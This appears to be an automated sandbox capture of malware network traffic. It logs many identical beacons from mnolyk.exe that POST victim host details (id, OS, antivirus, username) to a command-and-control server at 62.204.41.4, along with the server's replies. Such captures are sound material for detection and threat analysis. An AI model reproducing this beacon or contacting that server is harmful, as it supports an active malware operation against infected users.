                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:35.139303923 CET473OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:35.204358101 CET474INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    274192.168.2.34997662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:36.257085085 CET474OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:36.324114084 CET475INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    275192.168.2.34997762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:36.501859903 CET475OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:36.565764904 CET476INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    276192.168.2.34997862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:36.743998051 CET476OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:36.808079958 CET477INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    277192.168.2.34997962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:36.980540037 CET477OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:37.043481112 CET478INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    278192.168.2.34998062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:37.216068983 CET478OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:37.279519081 CET479INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    279192.168.2.34998162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:37.449608088 CET479OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:37.512573004 CET480INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    28192.168.2.34973062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:23.623023987 CET229OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:23.688044071 CET229INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    280192.168.2.34998262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:37.682518959 CET480OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:37.745387077 CET481INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    281192.168.2.34998362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:37.924287081 CET481OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:37.988426924 CET482INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    282192.168.2.34998462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:38.166013956 CET482OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:38.232606888 CET483INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    283192.168.2.34998562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:38.403501034 CET483OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:38.467078924 CET484INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    284192.168.2.34998662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:38.636974096 CET484OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:38.702825069 CET485INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    285192.168.2.34998762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:38.868567944 CET485OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:38.931410074 CET486INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    286192.168.2.34998862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:39.106972933 CET486OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:39.173105001 CET487INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    287192.168.2.34998962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:39.351030111 CET487OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:39.415781975 CET488INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    288192.168.2.34999062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:39.589080095 CET488OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:39.652473927 CET488INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    289192.168.2.34999162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:39.825639009 CET489OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:39.888402939 CET489INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    29192.168.2.34973162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:23.865412951 CET230OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:23.927287102 CET230INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    290192.168.2.34999262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:40.063951015 CET490OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:40.132488966 CET490INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
